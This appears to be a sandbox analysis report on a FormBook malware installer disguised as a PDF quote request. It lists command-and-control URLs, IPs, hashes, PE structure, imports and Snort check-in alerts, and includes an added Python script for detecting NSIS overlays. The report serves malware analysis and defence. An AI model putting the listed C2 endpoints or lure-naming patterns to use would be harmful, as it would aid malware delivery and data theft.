                                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                       Match: 199.59.242.153
                                                                       Associated Sample Name / URL | Detection | Context
                                                                       LWlcpDjYIQ.exe | malicious | www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                       RCS76393.exe | malicious | www.addthat.xyz/goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz
                                                                       PaymentAdvice.exe | malicious | www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m
                                                                       0BAdCQQVtP.exe | malicious | www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
                                                                       RFQ_ V-21-Kiel-050-D02.xlsx | malicious | www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
                                                                       New Order.exe | malicious | www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
                                                                       ALPHA SCIENCE, INC.exe | malicious | www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
                                                                       payment.exe | malicious | www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
                                                                       Order.exe | malicious | www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
                                                                       PaymentInvoice.exe | malicious | www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
                                                                       SB210330034.pdf.exe | malicious | www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
                                                                       swift_76567643.exe | malicious | www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
                                                                       Request an Estimate_2021_04_01.exe | malicious | www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
                                                                       2021-04-01.exe | malicious | www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
                                                                       onbgX3WswF.exe | malicious | www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
                                                                       ARBmDNJS7m.exe | malicious | www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
                                                                       Bista_094924,ppdf.exe | malicious | www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                       PO.1183.exe | malicious | www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
                                                                       Scan-45679.exe | malicious | www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
                                                                       TT Remittance Copy.PDF.exe | malicious | www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP

                                                                      Domains

                                                                       Match: www.1364kensington.com
                                                                       Associated Sample Name / URL | Detection | Context
                                                                       RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exe | malicious | 66.96.161.160

                                                                      ASN

                                                                       Match: BODIS-NJUS
                                                                       Associated Sample Name / URL | Detection | Context
                                                                       LWlcpDjYIQ.exe | malicious | 199.59.242.153
                                                                       RCS76393.exe | malicious | 199.59.242.153
                                                                       PaymentAdvice.exe | malicious | 199.59.242.153
                                                                       0BAdCQQVtP.exe | malicious | 199.59.242.153
                                                                       RFQ_ V-21-Kiel-050-D02.xlsx | malicious | 199.59.242.153
                                                                       New Order.exe | malicious | 199.59.242.153
                                                                       ALPHA SCIENCE, INC.exe | malicious | 199.59.242.153
                                                                       payment.exe | malicious | 199.59.242.153
                                                                       Order.exe | malicious | 199.59.242.153
                                                                       PaymentInvoice.exe | malicious | 199.59.242.153
                                                                       SB210330034.pdf.exe | malicious | 199.59.242.153
                                                                       swift_76567643.exe | malicious | 199.59.242.153
                                                                       Request an Estimate_2021_04_01.exe | malicious | 199.59.242.153
                                                                       2021-04-01.exe | malicious | 199.59.242.153
                                                                       onbgX3WswF.exe | malicious | 199.59.242.153
                                                                       ARBmDNJS7m.exe | malicious | 199.59.242.153
                                                                       Bista_094924,ppdf.exe | malicious | 199.59.242.153
                                                                       PO.1183.exe | malicious | 199.59.242.153
                                                                       Scan-45679.exe | malicious | 199.59.242.153
                                                                       TT Remittance Copy.PDF.exe | malicious | 199.59.242.153

                                                                       Match: BIZLAND-SDUS
                                                                       Associated Sample Name / URL | Detection | Context
                                                                       PaymentAdvice.exe | malicious | 66.96.162.131
                                                                       Calt7BoW2a.exe | malicious | 66.96.162.128
                                                                       46578-TR.exe | malicious | 66.96.162.136
                                                                       RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exe | malicious | 66.96.161.160
                                                                       PO91361.exe | malicious | 66.96.162.129
                                                                       56_012021.doc | malicious | 66.96.149.32
                                                                       RFQ-V-SAM-0321D056-DOC.exe | malicious | 207.148.248.143
                                                                       W88AZXFGH.exe | malicious | 66.96.162.131
                                                                       Purchase Orders.exe | malicious | 65.254.248.81
                                                                       02B56iRnVM.exe | malicious | 209.59.219.1
                                                                       Swift 76498,pdf.exe | malicious | 66.96.134.26
                                                                       new built.exe | malicious | 66.96.162.131
                                                                       BL Draft copy.exe | malicious | 66.96.162.128
                                                                       PaymentInvoice.exe | malicious | 66.96.162.131
                                                                       SHIPPING DOCUMENTS.exe | malicious | 66.96.162.131
                                                                       bank details.exe | malicious | 65.254.248.81
                                                                       Payment_png.exe | malicious | 66.96.160.133
                                                                       salescontractv2draft.exe | malicious | 66.96.162.149
                                                                       orders.exe | malicious | 65.254.248.81
                                                                       Order-PO-0186500.exe | malicious | 207.148.248.143

                                                                       Match: ASN-QUADRANET-GLOBALUS
                                                                       Associated Sample Name / URL | Detection | Context
                                                                       Payment Slip.exe | malicious | 192.161.187.200
                                                                       ORDER343346PO3455.exe | malicious | 172.93.187.249
                                                                       PO987633ORDER443REQUEST.exe | malicious | 172.93.187.249
                                                                       ORDER93949394.exe | malicious | 172.93.187.249
                                                                       ORDER34543REQUEST34444PO.exe | malicious | 172.93.187.249
                                                                       ORDER34543REQUEST34444PO343.exe | malicious | 172.93.187.249
                                                                       ORDER03094838493.exe | malicious | 172.93.187.249
                                                                       ORDER0039484#PO.exe | malicious | 172.93.187.249
                                                                       PO#ORDER937743.exe | malicious | 172.93.187.249
                                                                       ORDER33439484#PO.exe | malicious | 172.93.187.249
                                                                       SWIFTCOPY_110255293303484_SANTANDER.doc | malicious | 185.174.101.41
                                                                       SbdCFa6pNA | malicious | 173.254.217.214
                                                                       approved new order_April TT181.doc | malicious | 185.174.101.41
                                                                       OC CVE9362 _TVOP-MIO 24.doc | malicious | 185.174.101.41
                                                                       n74DqoAGos.exe | malicious | 173.44.50.137
                                                                       r74BL8gyil.exe | malicious | 173.44.50.137
                                                                       89OdCS5Qeu.exe | malicious | 161.129.66.224
                                                                       tcYgoJHJSg | malicious | 173.254.217.214
                                                                       vdaiygLkjH | malicious | 173.254.217.214
                                                                       4i1GUIgglX.exe | malicious | 192.161.48.5

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\7di05goozxs8
                                                                      Process:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):164864
                                                                      Entropy (8bit):7.998854864246748
                                                                      Encrypted:true
                                                                      SSDEEP:3072:d44peOnn7lgGgQgnGV5PLwDXnhgPKCUbRn0Ga7TY6EcH5w+lETIF7:DQOnn7UGV5wD3hbCQ0Ga7BjHVLF7
                                                                      MD5:D7088EEF0E87F0C50D1AD0DFB884F8DA
                                                                      SHA1:519B7075E47497CB94E28808C8D47DA194894FA1
                                                                      SHA-256:306DCF3EF4DBEE61EA91FF787766B702E9805A96621EB75691E4A879A9A50C0D
                                                                      SHA-512:5A0D8BA54187CE1F6692143FACC7773A7F1C3415FFB822F54067961CFD311877E71147D0A64130C624D664940BE56907147CFB4853E79F8FCEE4BC48434723E2
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      C:\Users\user\AppData\Local\Temp\dax13un2d6
                                                                      Process:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6661
                                                                      Entropy (8bit):7.956656063967567
                                                                      Encrypted:false
                                                                      SSDEEP:96:RKgkqsL2kJtjh68QB/riIEfOnL5sYoKP3BRO1PKd/S9chyHhfJ60WMLRFG/0sxYw:RDkqsNHG/cmnL5suvBROewQ4vLY0UsA
                                                                      MD5:30B449A67F91AF95CA2D7F6724868805
                                                                      SHA1:7AB0F79DC27576D0B670D1F0CA62827DF08C95C2
                                                                      SHA-256:35BF779A878919C60AABBFB59E9DD2935ACFB560B47C2DD6798535BDF1A27DD2
                                                                      SHA-512:087C45FDC0A3998CE02B9F23F90D0BF38F2E1F904B2785D93F8A992B392F91B255901B1558430FBEBFE8C3178E460FF7F9A3D2641DE644AA532929B11B112A05
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                      Process:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):5120
                                                                      Entropy (8bit):4.185149071228919
                                                                      Encrypted:false
                                                                      SSDEEP:48:StV2Zq6NN8MD5PHhqu8MUEm17OGa4zzBvoAXAdUMQ9BgqRuqSgSnM:oRo5yZUGXHBgVueKxbSM
                                                                      MD5:BA2AD591CE772A5D280C3F20D6A42998
                                                                      SHA1:CA6C574F5F1CB219754EA06459B3039E96A2D6C9
                                                                      SHA-256:5EB2CA7EF67E0748B9ED095660F89B0FE7972C30CB06F56D05E75C0899305831
                                                                      SHA-512:7C193F004FF41411E9F68A592EF9E2C34EA67F8B5C4F866A1E1EEEB7385E0151DD8ECBBFBA0B1485222323DFD6836F69C5CDFDA5B4CD927B7D42FA9F1DEB115D
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 23%
                                                                      Reputation:low

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.33175373329671
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File size:397431
                                                                      MD5:98f9ea244308bb5969ea3c302c32efcd
                                                                      SHA1:82a913894418af7834d23bc543eb286230d4edf4
                                                                      SHA256:cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
                                                                      SHA512:c300afa9a46ca0c9d12c395c90c7bcd1950513780d4fd3775525a4f431319e16504ee3ee2411050a48810b94eb29f3c9ee84ad8c6efd2460280c7091a5923847
                                                                      SSDEEP:6144:Dd9stvLGtELbMUTKZXQOnn7UGV5wD3hbCQ0Ga7BjHVLF7R:bSityjKzn7Uw5wD3hbQBRFN

File Icon

Icon Hash: 929296929e9e8eb2

Static PE Info

General

Entrypoint: 0x40314a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: (none)
Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC] (this is the link time of the prebuilt NSIS stub, not the date this installer was packed)
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

Entrypoint Preview

Instruction
sub esp, 0000017Ch
push ebx
push ebp
push esi
xor esi, esi
push edi
mov dword ptr [esp+18h], esi
mov ebp, 00409240h
mov byte ptr [esp+10h], 00000020h
call dword ptr [00407030h]
push esi
call dword ptr [00407270h]
mov dword ptr [007A3030h], eax
push esi
lea eax, dword ptr [esp+30h]
push 00000160h
push eax
push esi
push 0079E540h
call dword ptr [00407158h]
push 00409230h
push 007A2780h
call 00007FA370EE84D8h
mov ebx, 007AA400h
push ebx
push 00000400h
call dword ptr [004070B4h]
call 00007FA370EE5C19h
test eax, eax
jne 00007FA370EE5CD6h
push 000003FBh
push ebx
call dword ptr [004070B0h]
push 00409228h
push ebx
call 00007FA370EE84C3h
call 00007FA370EE5BF9h
test eax, eax
je 00007FA370EE5DF2h
mov edi, 007A9000h
push edi
call dword ptr [00407140h]
call dword ptr [004070ACh]
push eax
push edi
call 00007FA370EE8481h
push 00000000h
call dword ptr [00407108h]
cmp byte ptr [007A9000h], 00000022h
mov dword ptr [007A2F80h], eax
mov eax, edi
jne 00007FA370EE5CBCh
mov byte ptr [esp+10h], 00000022h
mov eax, 00000001h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7344           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3ac000         0x2f05b       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x280         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x59de        0x5a00    False     0.681293402778   data       6.5143386598   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7000           0x10f2        0x1200    False     0.430338541667   data       5.0554281206   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9000           0x39a034      0x400     unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x3a4000         0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x3ac000         0x2f05b       0x2f200   False     0.36241089191    data       6.22523060047  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
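The section table is the quickest tell that this PE is only a carrier: the raw sizes add up to 0x36200 bytes (221696) while the file is 397431 bytes long, so well over 170 KB sits past the last section as an overlay, which is where an NSIS installer keeps its compressed payload (the .ndata section is the other NSIS fingerprint). The following script is an added example, not part of the sandbox report: it parses a PE section table with the standard library, measures the overlay, and checks it for the NSIS first-header magic. Because the page does not list PointerToRawData values, the image it builds is a constructed stand-in that reuses only the section sizes above and assumes a 0x400-byte header block with contiguous sections; the resulting 174711-byte overlay is therefore an estimate for this sample, not a measurement of it.

```python
import struct
from datetime import datetime, timezone

# Section table values copied from the report for this sample
# (Name, VirtualAddress, VirtualSize, SizeOfRawData). PointerToRawData is not
# shown on the page, so the synthetic image below ASSUMES a 0x400-byte header
# block and contiguous, file-aligned sections.
REPORT_SECTIONS = [
    (b".text",  0x1000,   0x59de,   0x5a00),
    (b".rdata", 0x7000,   0x10f2,   0x1200),
    (b".data",  0x9000,   0x39a034, 0x400),
    (b".ndata", 0x3a4000, 0x8000,   0x0),
    (b".rsrc",  0x3ac000, 0x2f05b,  0x2f200),
]
REPORT_FILE_SIZE = 397431          # "File size" from the report
REPORT_TIMESTAMP = 0x4538CD0B      # "Time Stamp" from the report
NSIS_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"   # NSIS firstheader signature (0xDEADBEEF + "NullsoftInst")

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = struct.Struct("<HHIIIHH")           # IMAGE_FILE_HEADER, 20 bytes


def parse_sections(data: bytes) -> list:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsec, _ts, _, _, size_opt, _ = COFF_HDR.unpack_from(data, coff_off)
    off = coff_off + COFF_HDR.size + size_opt
    out = []
    for _ in range(nsec):
        name, vsize, va, rsize, rptr, *_ = SECTION_HDR.unpack_from(data, off)
        out.append({"name": name.rstrip(b"\0").decode(), "va": va,
                    "vsize": vsize, "raw_size": rsize, "raw_ptr": rptr})
        off += SECTION_HDR.size
    return out


def overlay_bytes(data: bytes) -> bytes:
    """Everything after the last byte claimed by any section's raw data.
    A plain compiled image has none; an NSIS installer keeps its payload here."""
    end = max((s["raw_ptr"] + s["raw_size"] for s in parse_sections(data)
               if s["raw_size"]), default=0)
    return data[end:]


def looks_like_nsis(overlay: bytes) -> bool:
    """Standard NSIS heuristic: the firstheader magic appears in the overlay."""
    return NSIS_MAGIC in overlay


def compile_time(ts: int) -> str:
    """Decode a PE TimeDateStamp; for NSIS this is the stub's link time."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def build_synthetic_pe(sections, total_size, header_size=0x400, timestamp=REPORT_TIMESTAMP) -> bytes:
    """Constructed stand-in image: headers plus a section table mirroring the report,
    zeroed section bodies, and an NSIS-style overlay padded to total_size bytes.
    This is NOT the malware sample; only its section-table numbers are reused."""
    hdr = bytearray(header_size)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)                      # e_lfanew
    hdr[0x80:0x84] = b"PE\0\0"
    size_opt = 0xE0                                              # PE32 optional header size
    COFF_HDR.pack_into(hdr, 0x84, 0x14C, len(sections), timestamp, 0, 0, size_opt, 0x010F)
    struct.pack_into("<H", hdr, 0x84 + COFF_HDR.size, 0x10B)    # Magic = PE32
    off = 0x84 + COFF_HDR.size + size_opt
    raw_ptr = header_size                                        # ASSUMPTION: sections start at 0x400
    for name, va, vsize, rsize in sections:
        SECTION_HDR.pack_into(hdr, off, name, vsize, va, rsize, raw_ptr if rsize else 0, 0, 0, 0, 0, 0)
        off += SECTION_HDR.size
        raw_ptr += rsize
    body = bytes(raw_ptr - header_size)
    overlay_len = total_size - header_size - len(body)
    if overlay_len < len(NSIS_MAGIC):
        raise ValueError("total_size too small for the section layout")
    overlay = NSIS_MAGIC + bytes(overlay_len - len(NSIS_MAGIC))
    return bytes(hdr) + body + overlay


SAMPLE = build_synthetic_pe(REPORT_SECTIONS, REPORT_FILE_SIZE)

if __name__ == "__main__":
    for s in parse_sections(SAMPLE):
        print(f'{s["name"]:<7} raw @ {s["raw_ptr"]:#08x} size {s["raw_size"]:#x} vsize {s["vsize"]:#x}')
    ov = overlay_bytes(SAMPLE)
    print(f"overlay: {len(ov)} bytes, NSIS magic present: {looks_like_nsis(ov)}")
    print("stub compile time:", compile_time(REPORT_TIMESTAMP))
```

On a real file replace SAMPLE with the bytes read from disk; the overlay check works unchanged, and an overlay that is large relative to the sections, or that carries the NSIS magic, tells you to extract the installer (7-Zip or an NSIS decompiler) rather than reverse the stub, whose 2006 timestamp and VC++ 6.0 Rich header say nothing about the payload.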

Resources

Name           RVA       Size     Language  Country        Type
RT_ICON        0x3ac310  0x709e                            PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x3b33b0  0x10828                           dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512
RT_ICON        0x3c3bd8  0x94a8                            data
RT_ICON        0x3cd080  0x5488                            data
RT_ICON        0x3d2508  0x4228                            dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 117440512
RT_ICON        0x3d6730  0x25a8                            data
RT_ICON        0x3d8cd8  0x10a8                            data
RT_ICON        0x3d9d80  0x988                             data
RT_ICON        0x3da708  0x468                             GLS_BINARY_LSB_FIRST
RT_DIALOG      0x3dab70  0x100    English   United States  data
RT_DIALOG      0x3dac70  0x11c    English   United States  data
RT_DIALOG      0x3dad8c  0x60     English   United States  data
RT_GROUP_ICON  0x3dadec  0x84                              data
RT_MANIFEST    0x3dae70  0x1eb    English   United States  XML 1.0 document, ASCII text, with very long lines, with no line terminators

Imports

DLL           Import
KERNEL32.dll  CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll    ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll     SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll   SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll  RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll  ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll     OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll   GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                        Source Port  Dest Port  Source IP       Dest IP
04/08/21-13:22:17.851992  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49764        80         192.168.2.4     162.241.244.61
04/08/21-13:22:17.851992  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49764        80         192.168.2.4     162.241.244.61
04/08/21-13:22:17.851992  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49764        80         192.168.2.4     162.241.244.61
04/08/21-13:22:23.881720  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49770        80         192.168.2.4     107.178.142.156
04/08/21-13:22:23.881720  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49770        80         192.168.2.4     107.178.142.156
04/08/21-13:22:23.881720  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49770        80         192.168.2.4     107.178.142.156
04/08/21-13:22:50.107975  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49772        80         192.168.2.4     35.246.6.109
04/08/21-13:22:50.107975  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49772        80         192.168.2.4     35.246.6.109
04/08/21-13:22:50.107975  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49772        80         192.168.2.4     35.246.6.109
